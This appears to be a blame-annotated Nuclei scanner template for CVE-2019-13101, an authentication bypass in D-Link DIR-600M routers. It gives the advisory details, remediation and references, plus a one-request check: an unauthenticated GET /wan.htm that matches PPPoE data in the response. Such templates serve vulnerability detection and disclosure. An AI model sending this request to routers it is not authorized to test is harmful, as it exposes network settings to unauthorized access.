2021-07-03 00:20:40 +00:00
id : CVE-2019-13101
info :
2022-11-29 05:40:02 +00:00
name : D-Link DIR-600M - Authentication Bypass
2022-04-22 10:38:41 +00:00
author : Suman_Kar
2021-07-03 00:20:40 +00:00
severity : critical
2022-05-17 09:18:12 +00:00
description : D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
2023-09-06 12:53:28 +00:00
remediation : |
Update the router's firmware to the latest version provided by D-Link.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250
2022-04-01 08:51:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
2022-05-17 09:18:12 +00:00
- https://us.dlink.com/en/security-advisory
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-13101
cwe-id : CWE-306
2023-12-12 11:07:52 +00:00
epss-score : 0.0359
2024-03-23 09:28:19 +00:00
epss-percentile : 0.9142
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : dlink
product : dir-600m_firmware
2024-01-14 09:21:50 +00:00
tags : cve2019,cve,packetstorm,edb,dlink,router,iot
2021-07-03 00:20:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-03 00:20:40 +00:00
- raw :
- |
2021-07-03 18:37:30 +00:00
GET /wan.htm HTTP/1.1
2021-07-03 00:20:40 +00:00
Host : {{Hostname}}
Origin : {{BaseURL}}
2021-07-03 18:37:30 +00:00
matchers-condition : and
2021-07-03 00:20:40 +00:00
matchers :
2021-07-03 18:37:30 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-03 18:37:30 +00:00
words :
- "/PPPoE/"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100af3cf81676c3a2a1bc2df5fd9a8f165442b9cab1f612b9824a7f1340c0ee49dd022100e14684c8fb70ae052c5b46650e2f320a016f6b34fc784daa1ed3a020a08c3d40:922c64590222798bb761d5b6d8e72950